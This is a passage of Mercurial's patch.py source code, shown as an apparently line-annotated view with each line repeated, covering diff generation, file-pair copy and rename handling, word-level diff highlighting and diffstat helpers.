2374 where `header` is a list of diff headers and `hunks` is an iterable of
2375 where `header` is a list of diff headers and `hunks` is an iterable of
2375 (`hunkrange`, `hunklines`) tuples.
2376 (`hunkrange`, `hunklines`) tuples.
2376
2377
2377 See diff() for the meaning of parameters.
2378 See diff() for the meaning of parameters.
2378 """
2379 """
2379
2380
2380 if opts is None:
2381 if opts is None:
2381 opts = mdiff.defaultopts
2382 opts = mdiff.defaultopts
2382
2383
2383 if not node1 and not node2:
2384 if not node1 and not node2:
2384 node1 = repo.dirstate.p1()
2385 node1 = repo.dirstate.p1()
2385
2386
2386 def lrugetfilectx():
2387 def lrugetfilectx():
2387 cache = {}
2388 cache = {}
2388 order = collections.deque()
2389 order = collections.deque()
2389 def getfilectx(f, ctx):
2390 def getfilectx(f, ctx):
2390 fctx = ctx.filectx(f, filelog=cache.get(f))
2391 fctx = ctx.filectx(f, filelog=cache.get(f))
2391 if f not in cache:
2392 if f not in cache:
2392 if len(cache) > 20:
2393 if len(cache) > 20:
2393 del cache[order.popleft()]
2394 del cache[order.popleft()]
2394 cache[f] = fctx.filelog()
2395 cache[f] = fctx.filelog()
2395 else:
2396 else:
2396 order.remove(f)
2397 order.remove(f)
2397 order.append(f)
2398 order.append(f)
2398 return fctx
2399 return fctx
2399 return getfilectx
2400 return getfilectx
2400 getfilectx = lrugetfilectx()
2401 getfilectx = lrugetfilectx()
2401
2402
2402 ctx1 = repo[node1]
2403 ctx1 = repo[node1]
2403 ctx2 = repo[node2]
2404 ctx2 = repo[node2]
2404
2405
2405 relfiltered = False
2406 relfiltered = False
2406 if relroot != '' and match.always():
2407 if relroot != '' and match.always():
2407 # as a special case, create a new matcher with just the relroot
2408 # as a special case, create a new matcher with just the relroot
2408 pats = [relroot]
2409 pats = [relroot]
2409 match = scmutil.match(ctx2, pats, default='path')
2410 match = scmutil.match(ctx2, pats, default='path')
2410 relfiltered = True
2411 relfiltered = True
2411
2412
2412 if not changes:
2413 if not changes:
2413 changes = repo.status(ctx1, ctx2, match=match)
2414 changes = repo.status(ctx1, ctx2, match=match)
2414 modified, added, removed = changes[:3]
2415 modified, added, removed = changes[:3]
2415
2416
2416 if not modified and not added and not removed:
2417 if not modified and not added and not removed:
2417 return []
2418 return []
2418
2419
2419 if repo.ui.debugflag:
2420 if repo.ui.debugflag:
2420 hexfunc = hex
2421 hexfunc = hex
2421 else:
2422 else:
2422 hexfunc = short
2423 hexfunc = short
2423 revs = [hexfunc(node) for node in [ctx1.node(), ctx2.node()] if node]
2424 revs = [hexfunc(node) for node in [ctx1.node(), ctx2.node()] if node]
2424
2425
2425 if copy is None:
2426 if copy is None:
2426 copy = {}
2427 copy = {}
2427 if opts.git or opts.upgrade:
2428 if opts.git or opts.upgrade:
2428 copy = copies.pathcopies(ctx1, ctx2, match=match)
2429 copy = copies.pathcopies(ctx1, ctx2, match=match)
2429
2430
2430 if relroot is not None:
2431 if relroot is not None:
2431 if not relfiltered:
2432 if not relfiltered:
2432 # XXX this would ideally be done in the matcher, but that is
2433 # XXX this would ideally be done in the matcher, but that is
2433 # generally meant to 'or' patterns, not 'and' them. In this case we
2434 # generally meant to 'or' patterns, not 'and' them. In this case we
2434 # need to 'and' all the patterns from the matcher with relroot.
2435 # need to 'and' all the patterns from the matcher with relroot.
2435 def filterrel(l):
2436 def filterrel(l):
2436 return [f for f in l if f.startswith(relroot)]
2437 return [f for f in l if f.startswith(relroot)]
2437 modified = filterrel(modified)
2438 modified = filterrel(modified)
2438 added = filterrel(added)
2439 added = filterrel(added)
2439 removed = filterrel(removed)
2440 removed = filterrel(removed)
2440 relfiltered = True
2441 relfiltered = True
2441 # filter out copies where either side isn't inside the relative root
2442 # filter out copies where either side isn't inside the relative root
2442 copy = dict(((dst, src) for (dst, src) in copy.iteritems()
2443 copy = dict(((dst, src) for (dst, src) in copy.iteritems()
2443 if dst.startswith(relroot)
2444 if dst.startswith(relroot)
2444 and src.startswith(relroot)))
2445 and src.startswith(relroot)))
2445
2446
2446 modifiedset = set(modified)
2447 modifiedset = set(modified)
2447 addedset = set(added)
2448 addedset = set(added)
2448 removedset = set(removed)
2449 removedset = set(removed)
2449 for f in modified:
2450 for f in modified:
2450 if f not in ctx1:
2451 if f not in ctx1:
2451 # Fix up added, since merged-in additions appear as
2452 # Fix up added, since merged-in additions appear as
2452 # modifications during merges
2453 # modifications during merges
2453 modifiedset.remove(f)
2454 modifiedset.remove(f)
2454 addedset.add(f)
2455 addedset.add(f)
2455 for f in removed:
2456 for f in removed:
2456 if f not in ctx1:
2457 if f not in ctx1:
2457 # Merged-in additions that are then removed are reported as removed.
2458 # Merged-in additions that are then removed are reported as removed.
2458 # They are not in ctx1, so We don't want to show them in the diff.
2459 # They are not in ctx1, so We don't want to show them in the diff.
2459 removedset.remove(f)
2460 removedset.remove(f)
2460 modified = sorted(modifiedset)
2461 modified = sorted(modifiedset)
2461 added = sorted(addedset)
2462 added = sorted(addedset)
2462 removed = sorted(removedset)
2463 removed = sorted(removedset)
2463 for dst, src in list(copy.items()):
2464 for dst, src in list(copy.items()):
2464 if src not in ctx1:
2465 if src not in ctx1:
2465 # Files merged in during a merge and then copied/renamed are
2466 # Files merged in during a merge and then copied/renamed are
2466 # reported as copies. We want to show them in the diff as additions.
2467 # reported as copies. We want to show them in the diff as additions.
2467 del copy[dst]
2468 del copy[dst]
2468
2469
2469 prefetchmatch = scmutil.matchfiles(
2470 prefetchmatch = scmutil.matchfiles(
2470 repo, list(modifiedset | addedset | removedset))
2471 repo, list(modifiedset | addedset | removedset))
2471 scmutil.prefetchfiles(repo, [ctx1.rev(), ctx2.rev()], prefetchmatch)
2472 scmutil.prefetchfiles(repo, [ctx1.rev(), ctx2.rev()], prefetchmatch)
2472
2473
2473 def difffn(opts, losedata):
2474 def difffn(opts, losedata):
2474 return trydiff(repo, revs, ctx1, ctx2, modified, added, removed,
2475 return trydiff(repo, revs, ctx1, ctx2, modified, added, removed,
2475 copy, getfilectx, opts, losedata, prefix, relroot)
2476 copy, getfilectx, opts, losedata, prefix, relroot)
2476 if opts.upgrade and not opts.git:
2477 if opts.upgrade and not opts.git:
2477 try:
2478 try:
2478 def losedata(fn):
2479 def losedata(fn):
2479 if not losedatafn or not losedatafn(fn=fn):
2480 if not losedatafn or not losedatafn(fn=fn):
2480 raise GitDiffRequired
2481 raise GitDiffRequired
2481 # Buffer the whole output until we are sure it can be generated
2482 # Buffer the whole output until we are sure it can be generated
2482 return list(difffn(opts.copy(git=False), losedata))
2483 return list(difffn(opts.copy(git=False), losedata))
2483 except GitDiffRequired:
2484 except GitDiffRequired:
2484 return difffn(opts.copy(git=True), None)
2485 return difffn(opts.copy(git=True), None)
2485 else:
2486 else:
2486 return difffn(opts, None)
2487 return difffn(opts, None)
2487
2488
2488 def diffsinglehunk(hunklines):
2489 def diffsinglehunk(hunklines):
2489 """yield tokens for a list of lines in a single hunk"""
2490 """yield tokens for a list of lines in a single hunk"""
2490 for line in hunklines:
2491 for line in hunklines:
2491 # chomp
2492 # chomp
2492 chompline = line.rstrip('\n')
2493 chompline = line.rstrip('\n')
2493 # highlight tabs and trailing whitespace
2494 # highlight tabs and trailing whitespace
2494 stripline = chompline.rstrip()
2495 stripline = chompline.rstrip()
2495 if line.startswith('-'):
2496 if line.startswith('-'):
2496 label = 'diff.deleted'
2497 label = 'diff.deleted'
2497 elif line.startswith('+'):
2498 elif line.startswith('+'):
2498 label = 'diff.inserted'
2499 label = 'diff.inserted'
2499 else:
2500 else:
2500 raise error.ProgrammingError('unexpected hunk line: %s' % line)
2501 raise error.ProgrammingError('unexpected hunk line: %s' % line)
2501 for token in tabsplitter.findall(stripline):
2502 for token in tabsplitter.findall(stripline):
2502 if token.startswith('\t'):
2503 if token.startswith('\t'):
2503 yield (token, 'diff.tab')
2504 yield (token, 'diff.tab')
2504 else:
2505 else:
2505 yield (token, label)
2506 yield (token, label)
2506
2507
2507 if chompline != stripline:
2508 if chompline != stripline:
2508 yield (chompline[len(stripline):], 'diff.trailingwhitespace')
2509 yield (chompline[len(stripline):], 'diff.trailingwhitespace')
2509 if chompline != line:
2510 if chompline != line:
2510 yield (line[len(chompline):], '')
2511 yield (line[len(chompline):], '')
2511
2512
2512 def diffsinglehunkinline(hunklines):
2513 def diffsinglehunkinline(hunklines):
2513 """yield tokens for a list of lines in a single hunk, with inline colors"""
2514 """yield tokens for a list of lines in a single hunk, with inline colors"""
2514 # prepare deleted, and inserted content
2515 # prepare deleted, and inserted content
2515 a = ''
2516 a = ''
2516 b = ''
2517 b = ''
2517 for line in hunklines:
2518 for line in hunklines:
2518 if line[0] == '-':
2519 if line[0] == '-':
2519 a += line[1:]
2520 a += line[1:]
2520 elif line[0] == '+':
2521 elif line[0] == '+':
2521 b += line[1:]
2522 b += line[1:]
2522 else:
2523 else:
2523 raise error.ProgrammingError('unexpected hunk line: %s' % line)
2524 raise error.ProgrammingError('unexpected hunk line: %s' % line)
2524 # fast path: if either side is empty, use diffsinglehunk
2525 # fast path: if either side is empty, use diffsinglehunk
2525 if not a or not b:
2526 if not a or not b:
2526 for t in diffsinglehunk(hunklines):
2527 for t in diffsinglehunk(hunklines):
2527 yield t
2528 yield t
2528 return
2529 return
2529 # re-split the content into words
2530 # re-split the content into words
2530 al = wordsplitter.findall(a)
2531 al = wordsplitter.findall(a)
2531 bl = wordsplitter.findall(b)
2532 bl = wordsplitter.findall(b)
2532 # re-arrange the words to lines since the diff algorithm is line-based
2533 # re-arrange the words to lines since the diff algorithm is line-based
2533 aln = [s if s == '\n' else s + '\n' for s in al]
2534 aln = [s if s == '\n' else s + '\n' for s in al]
2534 bln = [s if s == '\n' else s + '\n' for s in bl]
2535 bln = [s if s == '\n' else s + '\n' for s in bl]
2535 an = ''.join(aln)
2536 an = ''.join(aln)
2536 bn = ''.join(bln)
2537 bn = ''.join(bln)
2537 # run the diff algorithm, prepare atokens and btokens
2538 # run the diff algorithm, prepare atokens and btokens
2538 atokens = []
2539 atokens = []
2539 btokens = []
2540 btokens = []
2540 blocks = mdiff.allblocks(an, bn, lines1=aln, lines2=bln)
2541 blocks = mdiff.allblocks(an, bn, lines1=aln, lines2=bln)
2541 for (a1, a2, b1, b2), btype in blocks:
2542 for (a1, a2, b1, b2), btype in blocks:
2542 changed = btype == '!'
2543 changed = btype == '!'
2543 for token in mdiff.splitnewlines(''.join(al[a1:a2])):
2544 for token in mdiff.splitnewlines(''.join(al[a1:a2])):
2544 atokens.append((changed, token))
2545 atokens.append((changed, token))
2545 for token in mdiff.splitnewlines(''.join(bl[b1:b2])):
2546 for token in mdiff.splitnewlines(''.join(bl[b1:b2])):
2546 btokens.append((changed, token))
2547 btokens.append((changed, token))
2547
2548
2548 # yield deleted tokens, then inserted ones
2549 # yield deleted tokens, then inserted ones
2549 for prefix, label, tokens in [('-', 'diff.deleted', atokens),
2550 for prefix, label, tokens in [('-', 'diff.deleted', atokens),
2550 ('+', 'diff.inserted', btokens)]:
2551 ('+', 'diff.inserted', btokens)]:
2551 nextisnewline = True
2552 nextisnewline = True
2552 for changed, token in tokens:
2553 for changed, token in tokens:
2553 if nextisnewline:
2554 if nextisnewline:
2554 yield (prefix, label)
2555 yield (prefix, label)
2555 nextisnewline = False
2556 nextisnewline = False
2556 # special handling line end
2557 # special handling line end
2557 isendofline = token.endswith('\n')
2558 isendofline = token.endswith('\n')
2558 if isendofline:
2559 if isendofline:
2559 chomp = token[:-1] # chomp
2560 chomp = token[:-1] # chomp
2560 token = chomp.rstrip() # detect spaces at the end
2561 token = chomp.rstrip() # detect spaces at the end
2561 endspaces = chomp[len(token):]
2562 endspaces = chomp[len(token):]
2562 # scan tabs
2563 # scan tabs
2563 for maybetab in tabsplitter.findall(token):
2564 for maybetab in tabsplitter.findall(token):
2564 if '\t' == maybetab[0]:
2565 if '\t' == maybetab[0]:
2565 currentlabel = 'diff.tab'
2566 currentlabel = 'diff.tab'
2566 else:
2567 else:
2567 if changed:
2568 if changed:
2568 currentlabel = label + '.changed'
2569 currentlabel = label + '.changed'
2569 else:
2570 else:
2570 currentlabel = label + '.unchanged'
2571 currentlabel = label + '.unchanged'
2571 yield (maybetab, currentlabel)
2572 yield (maybetab, currentlabel)
2572 if isendofline:
2573 if isendofline:
2573 if endspaces:
2574 if endspaces:
2574 yield (endspaces, 'diff.trailingwhitespace')
2575 yield (endspaces, 'diff.trailingwhitespace')
2575 yield ('\n', '')
2576 yield ('\n', '')
2576 nextisnewline = True
2577 nextisnewline = True
2577
2578
2578 def difflabel(func, *args, **kw):
2579 def difflabel(func, *args, **kw):
2579 '''yields 2-tuples of (output, label) based on the output of func()'''
2580 '''yields 2-tuples of (output, label) based on the output of func()'''
2580 if kw.get(r'opts') and kw[r'opts'].worddiff:
2581 if kw.get(r'opts') and kw[r'opts'].worddiff:
2581 dodiffhunk = diffsinglehunkinline
2582 dodiffhunk = diffsinglehunkinline
2582 else:
2583 else:
2583 dodiffhunk = diffsinglehunk
2584 dodiffhunk = diffsinglehunk
2584 headprefixes = [('diff', 'diff.diffline'),
2585 headprefixes = [('diff', 'diff.diffline'),
2585 ('copy', 'diff.extended'),
2586 ('copy', 'diff.extended'),
2586 ('rename', 'diff.extended'),
2587 ('rename', 'diff.extended'),
2587 ('old', 'diff.extended'),
2588 ('old', 'diff.extended'),
2588 ('new', 'diff.extended'),
2589 ('new', 'diff.extended'),
2589 ('deleted', 'diff.extended'),
2590 ('deleted', 'diff.extended'),
2590 ('index', 'diff.extended'),
2591 ('index', 'diff.extended'),
2591 ('similarity', 'diff.extended'),
2592 ('similarity', 'diff.extended'),
2592 ('---', 'diff.file_a'),
2593 ('---', 'diff.file_a'),
2593 ('+++', 'diff.file_b')]
2594 ('+++', 'diff.file_b')]
2594 textprefixes = [('@', 'diff.hunk'),
2595 textprefixes = [('@', 'diff.hunk'),
2595 # - and + are handled by diffsinglehunk
2596 # - and + are handled by diffsinglehunk
2596 ]
2597 ]
2597 head = False
2598 head = False
2598
2599
2599 # buffers a hunk, i.e. adjacent "-", "+" lines without other changes.
2600 # buffers a hunk, i.e. adjacent "-", "+" lines without other changes.
2600 hunkbuffer = []
2601 hunkbuffer = []
2601 def consumehunkbuffer():
2602 def consumehunkbuffer():
2602 if hunkbuffer:
2603 if hunkbuffer:
2603 for token in dodiffhunk(hunkbuffer):
2604 for token in dodiffhunk(hunkbuffer):
2604 yield token
2605 yield token
2605 hunkbuffer[:] = []
2606 hunkbuffer[:] = []
2606
2607
2607 for chunk in func(*args, **kw):
2608 for chunk in func(*args, **kw):
2608 lines = chunk.split('\n')
2609 lines = chunk.split('\n')
2609 linecount = len(lines)
2610 linecount = len(lines)
2610 for i, line in enumerate(lines):
2611 for i, line in enumerate(lines):
2611 if head:
2612 if head:
2612 if line.startswith('@'):
2613 if line.startswith('@'):
2613 head = False
2614 head = False
2614 else:
2615 else:
2615 if line and not line.startswith((' ', '+', '-', '@', '\\')):
2616 if line and not line.startswith((' ', '+', '-', '@', '\\')):
2616 head = True
2617 head = True
2617 diffline = False
2618 diffline = False
2618 if not head and line and line.startswith(('+', '-')):
2619 if not head and line and line.startswith(('+', '-')):
2619 diffline = True
2620 diffline = True
2620
2621
2621 prefixes = textprefixes
2622 prefixes = textprefixes
2622 if head:
2623 if head:
2623 prefixes = headprefixes
2624 prefixes = headprefixes
2624 if diffline:
2625 if diffline:
2625 # buffered
2626 # buffered
2626 bufferedline = line
2627 bufferedline = line
2627 if i + 1 < linecount:
2628 if i + 1 < linecount:
2628 bufferedline += "\n"
2629 bufferedline += "\n"
2629 hunkbuffer.append(bufferedline)
2630 hunkbuffer.append(bufferedline)
2630 else:
2631 else:
2631 # unbuffered
2632 # unbuffered
2632 for token in consumehunkbuffer():
2633 for token in consumehunkbuffer():
2633 yield token
2634 yield token
2634 stripline = line.rstrip()
2635 stripline = line.rstrip()
2635 for prefix, label in prefixes:
2636 for prefix, label in prefixes:
2636 if stripline.startswith(prefix):
2637 if stripline.startswith(prefix):
2637 yield (stripline, label)
2638 yield (stripline, label)
2638 if line != stripline:
2639 if line != stripline:
2639 yield (line[len(stripline):],
2640 yield (line[len(stripline):],
2640 'diff.trailingwhitespace')
2641 'diff.trailingwhitespace')
2641 break
2642 break
2642 else:
2643 else:
2643 yield (line, '')
2644 yield (line, '')
2644 if i + 1 < linecount:
2645 if i + 1 < linecount:
2645 yield ('\n', '')
2646 yield ('\n', '')
2646 for token in consumehunkbuffer():
2647 for token in consumehunkbuffer():
2647 yield token
2648 yield token
2648
2649
2649 def diffui(*args, **kw):
2650 def diffui(*args, **kw):
2650 '''like diff(), but yields 2-tuples of (output, label) for ui.write()'''
2651 '''like diff(), but yields 2-tuples of (output, label) for ui.write()'''
2651 return difflabel(diff, *args, **kw)
2652 return difflabel(diff, *args, **kw)
2652
2653
2653 def _filepairs(modified, added, removed, copy, opts):
2654 def _filepairs(modified, added, removed, copy, opts):
2654 '''generates tuples (f1, f2, copyop), where f1 is the name of the file
2655 '''generates tuples (f1, f2, copyop), where f1 is the name of the file
2655 before and f2 is the the name after. For added files, f1 will be None,
2656 before and f2 is the the name after. For added files, f1 will be None,
2656 and for removed files, f2 will be None. copyop may be set to None, 'copy'
2657 and for removed files, f2 will be None. copyop may be set to None, 'copy'
2657 or 'rename' (the latter two only if opts.git is set).'''
2658 or 'rename' (the latter two only if opts.git is set).'''
2658 gone = set()
2659 gone = set()
2659
2660
2660 copyto = dict([(v, k) for k, v in copy.items()])
2661 copyto = dict([(v, k) for k, v in copy.items()])
2661
2662
2662 addedset, removedset = set(added), set(removed)
2663 addedset, removedset = set(added), set(removed)
2663
2664
2664 for f in sorted(modified + added + removed):
2665 for f in sorted(modified + added + removed):
2665 copyop = None
2666 copyop = None
2666 f1, f2 = f, f
2667 f1, f2 = f, f
2667 if f in addedset:
2668 if f in addedset:
2668 f1 = None
2669 f1 = None
2669 if f in copy:
2670 if f in copy:
2670 if opts.git:
2671 if opts.git:
2671 f1 = copy[f]
2672 f1 = copy[f]
2672 if f1 in removedset and f1 not in gone:
2673 if f1 in removedset and f1 not in gone:
2673 copyop = 'rename'
2674 copyop = 'rename'
2674 gone.add(f1)
2675 gone.add(f1)
2675 else:
2676 else:
2676 copyop = 'copy'
2677 copyop = 'copy'
2677 elif f in removedset:
2678 elif f in removedset:
2678 f2 = None
2679 f2 = None
2679 if opts.git:
2680 if opts.git:
2680 # have we already reported a copy above?
2681 # have we already reported a copy above?
2681 if (f in copyto and copyto[f] in addedset
2682 if (f in copyto and copyto[f] in addedset
2682 and copy[copyto[f]] == f):
2683 and copy[copyto[f]] == f):
2683 continue
2684 continue
2684 yield f1, f2, copyop
2685 yield f1, f2, copyop
2685
2686
2686 def trydiff(repo, revs, ctx1, ctx2, modified, added, removed,
2687 def trydiff(repo, revs, ctx1, ctx2, modified, added, removed,
2687 copy, getfilectx, opts, losedatafn, prefix, relroot):
2688 copy, getfilectx, opts, losedatafn, prefix, relroot):
2688 '''given input data, generate a diff and yield it in blocks
2689 '''given input data, generate a diff and yield it in blocks
2689
2690
2690 If generating a diff would lose data like flags or binary data and
2691 If generating a diff would lose data like flags or binary data and
2691 losedatafn is not None, it will be called.
2692 losedatafn is not None, it will be called.
2692
2693
2693 relroot is removed and prefix is added to every path in the diff output.
2694 relroot is removed and prefix is added to every path in the diff output.
2694
2695
2695 If relroot is not empty, this function expects every path in modified,
2696 If relroot is not empty, this function expects every path in modified,
2696 added, removed and copy to start with it.'''
2697 added, removed and copy to start with it.'''
2697
2698
2698 def gitindex(text):
2699 def gitindex(text):
2699 if not text:
2700 if not text:
2700 text = ""
2701 text = ""
2701 l = len(text)
2702 l = len(text)
2702 s = hashlib.sha1('blob %d\0' % l)
2703 s = hashlib.sha1('blob %d\0' % l)
2703 s.update(text)
2704 s.update(text)
2704 return hex(s.digest())
2705 return hex(s.digest())
2705
2706
2706 if opts.noprefix:
2707 if opts.noprefix:
2707 aprefix = bprefix = ''
2708 aprefix = bprefix = ''
2708 else:
2709 else:
2709 aprefix = 'a/'
2710 aprefix = 'a/'
2710 bprefix = 'b/'
2711 bprefix = 'b/'
2711
2712
2712 def diffline(f, revs):
2713 def diffline(f, revs):
2713 revinfo = ' '.join(["-r %s" % rev for rev in revs])
2714 revinfo = ' '.join(["-r %s" % rev for rev in revs])
2714 return 'diff %s %s' % (revinfo, f)
2715 return 'diff %s %s' % (revinfo, f)
2715
2716
2716 def isempty(fctx):
2717 def isempty(fctx):
2717 return fctx is None or fctx.size() == 0
2718 return fctx is None or fctx.size() == 0
2718
2719
2719 date1 = dateutil.datestr(ctx1.date())
2720 date1 = dateutil.datestr(ctx1.date())
2720 date2 = dateutil.datestr(ctx2.date())
2721 date2 = dateutil.datestr(ctx2.date())
2721
2722
2722 gitmode = {'l': '120000', 'x': '100755', '': '100644'}
2723 gitmode = {'l': '120000', 'x': '100755', '': '100644'}
2723
2724
2724 if relroot != '' and (repo.ui.configbool('devel', 'all-warnings')
2725 if relroot != '' and (repo.ui.configbool('devel', 'all-warnings')
2725 or repo.ui.configbool('devel', 'check-relroot')):
2726 or repo.ui.configbool('devel', 'check-relroot')):
2726 for f in modified + added + removed + list(copy) + list(copy.values()):
2727 for f in modified + added + removed + list(copy) + list(copy.values()):
2727 if f is not None and not f.startswith(relroot):
2728 if f is not None and not f.startswith(relroot):
2728 raise AssertionError(
2729 raise AssertionError(
2729 "file %s doesn't start with relroot %s" % (f, relroot))
2730 "file %s doesn't start with relroot %s" % (f, relroot))
2730
2731
2731 for f1, f2, copyop in _filepairs(modified, added, removed, copy, opts):
2732 for f1, f2, copyop in _filepairs(modified, added, removed, copy, opts):
2732 content1 = None
2733 content1 = None
2733 content2 = None
2734 content2 = None
2734 fctx1 = None
2735 fctx1 = None
2735 fctx2 = None
2736 fctx2 = None
2736 flag1 = None
2737 flag1 = None
2737 flag2 = None
2738 flag2 = None
2738 if f1:
2739 if f1:
2739 fctx1 = getfilectx(f1, ctx1)
2740 fctx1 = getfilectx(f1, ctx1)
2740 if opts.git or losedatafn:
2741 if opts.git or losedatafn:
2741 flag1 = ctx1.flags(f1)
2742 flag1 = ctx1.flags(f1)
2742 if f2:
2743 if f2:
2743 fctx2 = getfilectx(f2, ctx2)
2744 fctx2 = getfilectx(f2, ctx2)
2744 if opts.git or losedatafn:
2745 if opts.git or losedatafn:
2745 flag2 = ctx2.flags(f2)
2746 flag2 = ctx2.flags(f2)
2746 # if binary is True, output "summary" or "base85", but not "text diff"
2747 # if binary is True, output "summary" or "base85", but not "text diff"
2747 if opts.text:
2748 if opts.text:
2748 binary = False
2749 binary = False
2749 else:
2750 else:
2750 binary = any(f.isbinary() for f in [fctx1, fctx2] if f is not None)
2751 binary = any(f.isbinary() for f in [fctx1, fctx2] if f is not None)
2751
2752
2752 if losedatafn and not opts.git:
2753 if losedatafn and not opts.git:
2753 if (binary or
2754 if (binary or
2754 # copy/rename
2755 # copy/rename
2755 f2 in copy or
2756 f2 in copy or
2756 # empty file creation
2757 # empty file creation
2757 (not f1 and isempty(fctx2)) or
2758 (not f1 and isempty(fctx2)) or
2758 # empty file deletion
2759 # empty file deletion
2759 (isempty(fctx1) and not f2) or
2760 (isempty(fctx1) and not f2) or
2760 # create with flags
2761 # create with flags
2761 (not f1 and flag2) or
2762 (not f1 and flag2) or
2762 # change flags
2763 # change flags
2763 (f1 and f2 and flag1 != flag2)):
2764 (f1 and f2 and flag1 != flag2)):
2764 losedatafn(f2 or f1)
2765 losedatafn(f2 or f1)
2765
2766
2766 path1 = f1 or f2
2767 path1 = f1 or f2
2767 path2 = f2 or f1
2768 path2 = f2 or f1
2768 path1 = posixpath.join(prefix, path1[len(relroot):])
2769 path1 = posixpath.join(prefix, path1[len(relroot):])
2769 path2 = posixpath.join(prefix, path2[len(relroot):])
2770 path2 = posixpath.join(prefix, path2[len(relroot):])
2770 header = []
2771 header = []
2771 if opts.git:
2772 if opts.git:
2772 header.append('diff --git %s%s %s%s' %
2773 header.append('diff --git %s%s %s%s' %
2773 (aprefix, path1, bprefix, path2))
2774 (aprefix, path1, bprefix, path2))
2774 if not f1: # added
2775 if not f1: # added
2775 header.append('new file mode %s' % gitmode[flag2])
2776 header.append('new file mode %s' % gitmode[flag2])
2776 elif not f2: # removed
2777 elif not f2: # removed
2777 header.append('deleted file mode %s' % gitmode[flag1])
2778 header.append('deleted file mode %s' % gitmode[flag1])
2778 else: # modified/copied/renamed
2779 else: # modified/copied/renamed
2779 mode1, mode2 = gitmode[flag1], gitmode[flag2]
2780 mode1, mode2 = gitmode[flag1], gitmode[flag2]
2780 if mode1 != mode2:
2781 if mode1 != mode2:
2781 header.append('old mode %s' % mode1)
2782 header.append('old mode %s' % mode1)
2782 header.append('new mode %s' % mode2)
2783 header.append('new mode %s' % mode2)
2783 if copyop is not None:
2784 if copyop is not None:
2784 if opts.showsimilarity:
2785 if opts.showsimilarity:
2785 sim = similar.score(ctx1[path1], ctx2[path2]) * 100
2786 sim = similar.score(ctx1[path1], ctx2[path2]) * 100
2786 header.append('similarity index %d%%' % sim)
2787 header.append('similarity index %d%%' % sim)
2787 header.append('%s from %s' % (copyop, path1))
2788 header.append('%s from %s' % (copyop, path1))
2788 header.append('%s to %s' % (copyop, path2))
2789 header.append('%s to %s' % (copyop, path2))
2789 elif revs and not repo.ui.quiet:
2790 elif revs and not repo.ui.quiet:
2790 header.append(diffline(path1, revs))
2791 header.append(diffline(path1, revs))
2791
2792
2792 # fctx.is | diffopts | what to | is fctx.data()
2793 # fctx.is | diffopts | what to | is fctx.data()
2793 # binary() | text nobinary git index | output? | outputted?
2794 # binary() | text nobinary git index | output? | outputted?
2794 # ------------------------------------|----------------------------
2795 # ------------------------------------|----------------------------
2795 # yes | no no no * | summary | no
2796 # yes | no no no * | summary | no
2796 # yes | no no yes * | base85 | yes
2797 # yes | no no yes * | base85 | yes
2797 # yes | no yes no * | summary | no
2798 # yes | no yes no * | summary | no
2798 # yes | no yes yes 0 | summary | no
2799 # yes | no yes yes 0 | summary | no
2799 # yes | no yes yes >0 | summary | semi [1]
2800 # yes | no yes yes >0 | summary | semi [1]
2800 # yes | yes * * * | text diff | yes
2801 # yes | yes * * * | text diff | yes
2801 # no | * * * * | text diff | yes
2802 # no | * * * * | text diff | yes
2802 # [1]: hash(fctx.data()) is outputted. so fctx.data() cannot be faked
2803 # [1]: hash(fctx.data()) is outputted. so fctx.data() cannot be faked
2803 if binary and (not opts.git or (opts.git and opts.nobinary and not
2804 if binary and (not opts.git or (opts.git and opts.nobinary and not
2804 opts.index)):
2805 opts.index)):
2805 # fast path: no binary content will be displayed, content1 and
2806 # fast path: no binary content will be displayed, content1 and
2806 # content2 are only used for equivalent test. cmp() could have a
2807 # content2 are only used for equivalent test. cmp() could have a
2807 # fast path.
2808 # fast path.
2808 if fctx1 is not None:
2809 if fctx1 is not None:
2809 content1 = b'\0'
2810 content1 = b'\0'
2810 if fctx2 is not None:
2811 if fctx2 is not None:
2811 if fctx1 is not None and not fctx1.cmp(fctx2):
2812 if fctx1 is not None and not fctx1.cmp(fctx2):
2812 content2 = b'\0' # not different
2813 content2 = b'\0' # not different
2813 else:
2814 else:
2814 content2 = b'\0\0'
2815 content2 = b'\0\0'
2815 else:
2816 else:
2816 # normal path: load contents
2817 # normal path: load contents
2817 if fctx1 is not None:
2818 if fctx1 is not None:
2818 content1 = fctx1.data()
2819 content1 = fctx1.data()
2819 if fctx2 is not None:
2820 if fctx2 is not None:
2820 content2 = fctx2.data()
2821 content2 = fctx2.data()
2821
2822
2822 if binary and opts.git and not opts.nobinary:
2823 if binary and opts.git and not opts.nobinary:
2823 text = mdiff.b85diff(content1, content2)
2824 text = mdiff.b85diff(content1, content2)
2824 if text:
2825 if text:
2825 header.append('index %s..%s' %
2826 header.append('index %s..%s' %
2826 (gitindex(content1), gitindex(content2)))
2827 (gitindex(content1), gitindex(content2)))
2827 hunks = (None, [text]),
2828 hunks = (None, [text]),
2828 else:
2829 else:
2829 if opts.git and opts.index > 0:
2830 if opts.git and opts.index > 0:
2830 flag = flag1
2831 flag = flag1
2831 if flag is None:
2832 if flag is None:
2832 flag = flag2
2833 flag = flag2
2833 header.append('index %s..%s %s' %
2834 header.append('index %s..%s %s' %
2834 (gitindex(content1)[0:opts.index],
2835 (gitindex(content1)[0:opts.index],
2835 gitindex(content2)[0:opts.index],
2836 gitindex(content2)[0:opts.index],
2836 gitmode[flag]))
2837 gitmode[flag]))
2837
2838
2838 uheaders, hunks = mdiff.unidiff(content1, date1,
2839 uheaders, hunks = mdiff.unidiff(content1, date1,
2839 content2, date2,
2840 content2, date2,
2840 path1, path2,
2841 path1, path2,
2841 binary=binary, opts=opts)
2842 binary=binary, opts=opts)
2842 header.extend(uheaders)
2843 header.extend(uheaders)
2843 yield fctx1, fctx2, header, hunks
2844 yield fctx1, fctx2, header, hunks
2844
2845
2845 def diffstatsum(stats):
2846 def diffstatsum(stats):
2846 maxfile, maxtotal, addtotal, removetotal, binary = 0, 0, 0, 0, False
2847 maxfile, maxtotal, addtotal, removetotal, binary = 0, 0, 0, 0, False
2847 for f, a, r, b in stats:
2848 for f, a, r, b in stats:
2848 maxfile = max(maxfile, encoding.colwidth(f))
2849 maxfile = max(maxfile, encoding.colwidth(f))
2849 maxtotal = max(maxtotal, a + r)
2850 maxtotal = max(maxtotal, a + r)
2850 addtotal += a
2851 addtotal += a
2851 removetotal += r
2852 removetotal += r
2852 binary = binary or b
2853 binary = binary or b
2853
2854
2854 return maxfile, maxtotal, addtotal, removetotal, binary
2855 return maxfile, maxtotal, addtotal, removetotal, binary
2855
2856
2856 def diffstatdata(lines):
2857 def diffstatdata(lines):
2857 diffre = re.compile('^diff .*-r [a-z0-9]+\s(.*)$')
